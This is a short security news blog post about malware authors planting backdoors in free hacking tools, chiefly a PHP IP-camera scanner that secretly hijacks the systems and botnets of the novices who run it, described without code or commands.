Submitted by Micah Smith on Mon, 01/15/2018 - 13:27
Hacking the hackers
Hacking the hackers

We hear about government hacker teams going after each other in epic hacking matches, but do we ever hear of regular hackers doing the same? Could it be that the hackers are really trying to school other hackers or at least use them for their own purposes?

When hackers create malware software and target others, they actually prefer to catch other hackers in order to target their tools and utilize them. This was demonstrated this week by the Newsky Security researcher Ankit Anubhav with a new PHP script given freely on several underground hacking forums.

The PHP script allowed anyone to find vulnerable IP Cameras that are connected to the internet and infect them. Sounds like a gift to hackers, but nothing in life is entirely free and the price paid here was that the PHP script actually contained a secret backdoor that allows its creator to hack the hacker.

It’s like phishing or rather more like fishing. If you throw your hook in the water you don’t care if you catch the big predators or the medium-sized guys, as long as you catch something, you feel some sense of satisfaction, well, most of us do. 

Here is how it works:

First, the user uses code to scan for any vulnerability of cameras (its intended purpose). Then, the software secretly creates a backdoor user account with the same privileges of the wannabe-hacker. Then the script extracts the IP address of the user and installs a botnet that completely controls the user’s entire system.

There is a huge advantage in doing this, for the real hacker of course. If he/she catches a small fish (a wannabe hacker) with a decent amount of botnet devices, he can build a pretty big army and turn the robots against their human creators.

Or in the words of the researcher that found the secret backdoor: “if a script kiddie owns a botnet of 10,000 IoT and he gets hacked, the entire botnet is now in control of the attacker who got control of the system of this script kiddie. Hence, by exploiting one device, he can add thousands of botnets to his army”.

Apparently, this is a very common practice to put malware inside of malware or to hack the hacker, or any one of those tongue twisters.

Back in September a Cobian RAT builder kit was found to have a backdoor just like the one described above. In addition, we can add that last year, there was a Facebook hacking tool called Remtasu that was supposed to use a Windows-based Trojan to access people's’ Facebook credentials but actually took on the cyber deviant himself.

So if you are planning to go hacker and you aren't truly experienced, beware of wolves disguised as friendly cyber sheep giving out 'free gifts'.  The interest in hacking has become a phenomenon spreading throughout the ranks of cyber interest at every level of the food chain. The mainstream is moving slowly towards the Hacker forums and the cyber criminals, usually a few steps ahead, have taken notice and are playing these newbies at their own game.